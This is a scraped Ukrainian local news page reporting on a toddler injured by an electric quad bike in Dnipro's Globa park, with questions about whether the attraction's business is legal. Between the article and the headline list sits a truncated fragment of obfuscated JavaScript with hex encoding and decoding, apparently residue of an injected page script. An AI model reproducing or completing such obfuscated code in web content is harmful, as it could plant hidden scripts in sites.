10 Июнь, 18:07

Чи легальний бізнес приховують дитячі парки (ВІДЕО)

Півторарічна дитина під колесами квадроциклу. Кілька днів з моменту події, а керівництво парку Глоби та власник електромобільного атракціону –ховаються. Журналістів ігнорують, а від логічних запитань – тікають. Чи не затаївся біля міської ялинки незаконний бізнес? Як не допустити повторення жахливого випадку? 

У парку Глоби півторарічну дитину переїхав електромобіль. Така новина сколихнула місто увечері 8 червня.

Костянтин Гейко, інспектор патрульної поліції: «На транспортном средстве девушка 15-летняя ехала, сзади сидел инструктор, который должен был ей помогать. В итоге они не справились с управлением – сбили и переехали. Сейчас ребёнок на Космической».

Олександр Лацинський, завідуючий відділенням Дніпропетровської обласної дитячої лікарні: «Девочка гуляла с бабушкой, сзади неожиданно на нее наехал квадроцикл. У нее ушиб мозга первой степени, перелом правой ключицы и левой плечевой кости. Девочка доставлена в состоянии травматического шока».

Наразі стан постраждалої Улянки Войтенко – покращується. Вона при ясному розумі, вчора переведена з реанімації до відділення нейрохірургії. Журналістів до неї не пускають. Батьки, а також адміністрація парку Глоби відмовляються коментувати ДТП. А от зі слів власника електромобілів, випадок, що призвів до травматизму, — це звичайна випадковість.

Роман, власник електромобілів: «Едет машинка – выбежал ребенок, натолкнулся. Никто же на него конкретно не наезжал. Вот «бах» — и всё. И произошло. Просто недоразумение».

Окрім слідства за фактом ДТП, батьки дівчинки можуть звернутися до суду із громадянським позовом та виграти справу. З юридичної точки зору постає питання, чи оформлене функціонування атракціонів, як підприємницька діяльність та на якій підставі вона здійснюється у парку імені Глоби?

Антон Деньгуб, юрист: «Парки, скверы – это объекты благоустройства. Если это объекты благоустройства, то у нас есть шикарнейшее коммунальное предприятие, которое, в принципе, имеет возможность отдавать объекты благоустройства в виде скверов, парков, тротуаров под коммерческую определенную деятельность. Просто нужно именно посмотреть, есть ли у них такой договор».

Якщо подібна підприємницька діяльність все ж законна у парковій зоні, юристи пропонують обмежити її простір додатковим договором. Цей документ зобов’язав би підприємців поставити загородження для проїзду елекромобілів і проводити з відвідувачами більш детальні інструктажі.

Антон Деньгуб, юрист: «Территория парка – это то место, где дети могут вырваться из ручки и побежать, обнять машинку, которая едет им навстречу. Поэтому, конечно же, в идеале, было бы просто поставить либо какие-то преграды и только выбрать определенную территорию, где человек мог бы кататься там. Либо же все эти машинки перевести на пульты, которые исключили бы возможность маленького человечка давить на педальку «газ/тормоз» и ехать непонятно куда».

То чи законне функціонування приватного підприємства, на електромобілі якого збили Улянку? Чекаємо відповіді на запит до комунальників. Розслідування «9 каналу» триває.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "9-channel.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Вибір редакції

Без батьківського піклування у Дніпрі за півроку залишилося 118 дітей (КОМЕНТАР)

У місті продовжує діяти програма соціального захисту дітей у складних життєвих обставинах. У рамках проекту — організація свят і заходів

19 Июль, 08:19
Прогноз погоди на 19 липня, п’ятницю. Дніпро і область (ВІДЕО)

18 Июль, 21:09
Новини України та світу (ВІДЕО)

В Японському місті Уджі підпалили одну з найвідоміших анімаційних студій Kyoto Animation. Пожежа в триповерховому будинку сталася вночі 17 липня.

18 Июль, 19:53
У Дніпрі коштом міського бюджету ремонтують під’їзди житлових будинків (КОМЕНТАР)

У Дніпрі комунальники проводять планові ремонтні роботи житлових будинків. Цьогоріч запланували ремонти на 140 об'єктах. У будинках 4 та 6

18 Июль, 07:53
Стас і Валєра — «Типові садівники у хмарах» — інсталяція в Дніпрі (КОМЕНТАР)

Валєра і Стас — саме так звати відчайдушних садівників, які проти волі закону всесвітнього тяжіння доглядають за газоном на стіні

17 Июль, 21:02
Прогноз погоди на 18 липня, четвер. Дніпро і область (ВІДЕО)

17 Июль, 20:59
Новини України і світу (ВІДЕО)

Збитий над Донбасом літак, 289 загиблих, які були на борті - 17 липня відзначають роковини трагедії. Нагадаємо, 17 липня 2014

17 Июль, 20:20
У Дніпрі розпочали реконструкцію парку Гагаріна

17 Июль, 20:07